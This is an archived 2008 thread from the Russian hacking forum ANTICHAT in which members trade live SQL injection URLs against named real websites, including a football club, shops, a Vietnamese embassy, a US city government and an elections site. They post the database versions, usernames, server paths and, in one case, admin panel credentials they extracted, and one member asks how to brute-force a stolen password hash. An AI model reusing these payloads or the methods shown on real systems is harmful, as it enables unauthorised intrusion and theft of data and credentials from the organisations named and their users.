ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.08.2008, 03:11
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru
Код:
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru
Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php
К information_schema и mysql.user доступа нету( |
|
|
27.08.2008, 03:14
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от USAkid
Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru
Код:
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru
Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php
К information_schema и mysql.user доступа нету( конечно к information_schema доступа не будет.. этож 4 версия.. там его просто нет=)
|
|
|
|
27.08.2008, 07:41
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.nord-east.ru/index.php?id=-1111+union+select+1,table_name,3,4+from+informatio n_schema.tables+limit+0,1--
Строительная компания какая-то -)
только в табличках нифига толкового нету.
|
|
|
|
27.08.2008, 09:02
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Турфирма Эл ь ф-СПб
http://www.bustur.ru
Код:
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(version(),0x3a,user(),0x3a,database())--
version() - 5.1.19-beta
user() - petrotour@localhost
database() - petrotour
Есть контакт! Пошли таблички:
Код:
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables--
----------------------------------------------------------------
http://santechmart.ru
Код:
http://santechmart.ru/print.php?id=-1+union+select+concat_ws(version(),0x3a,user(),0x3a,database())--
version() - 5.0.41-log
user() - santechmartru@troy.mplik.ru
database() - santechmartru
Табличке:
Код:
http://santechmart.ru/print.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1--
Перебирать по: 2,1 ; 3,1 ; 4,1 и т.д. 
Последний раз редактировалось USAkid; 27.08.2008 в 09:23..
|
|
|
|
27.08.2008, 11:10
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600
Репутация:
850
|
|
http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from %20+users+limit+0,10/*
админка http://www.pc-olymp.ru/admin/
пароль и пасс
admin;admin
|
|
|
|
27.08.2008, 13:16
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Посольство Вьетнамское в Штатах.
http://viet.vietnamembassy.us/tintuc/index.php?category=93
Dbname: vnemb_news2004
Version:4.1.20-log
User:vnemb_3_r@209.68.2.136 |
|
|
|
27.08.2008, 15:57
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Америкосовские сайтеги... ы)
http://www.fairelections.us
Код:
http://www.fairelections.us/article.php?id=-104+union+select+1,2,unhex(hex(version())),4,5--
version() - 5.0.45-community-log
user() - ourcoupl_fairele@localhost
database() - ourcoupl_fairelections
От вывода инфы я офигел. Еле-еле-еле нашел. В общем снизу слева есть ссылочка: "Printer Safe Version", смотрим ее и видим интересующую нас инфу.
Таблички перебираем лимитом limit+2,1 ; 3,1 и т.д.
Код:
http://www.fairelections.us/article.php?id=-104+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+2,1--
|
|
|
|
27.08.2008, 16:36
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Ну что? Давайте пойдем покрупнее.
The City of Bremerton, WA
http://www.ci.bremerton.wa.us
На этом сайте я вообще вывода почти не нашел если бы НЕ циферка в коде, попавшаяся мне на глаза
Код:
http://www.ci.bremerton.wa.us/display.php?id=1039+union+select+1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14/*
version() - 4.1.12-log
user() - bremcity@localhost
database() - bremcity
Гуд выводы пошли, хорошо шифруются |
|
|
|
27.08.2008, 16:56
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Код:
http://www.host-sweet.com/profile/host.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*
3 4.0.26-standard:ho8802_sweet:ho8802_hideki@localhost
Код:
http://www.demonews.de/artikel/index.php?artikel=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())/*
Special: 4.1.22-max-log:d001e7e3:d001e7e3@85.13.137.29
|
|
|
|
27.08.2008, 17:19
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Код:
http://progmusic.ru/space/discography.php?id=-5+union+select+1,2,(concat_ws(0x3d,user_pass,user_fname,user_mail)),4,5,6,7,8+from+admin_users+limit+0,1--
Пасс=логин=мыло
вот только я с с паролями разобратся не смог, это же ведь не MD5, и как и брутить?  |
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Комбинированный вид
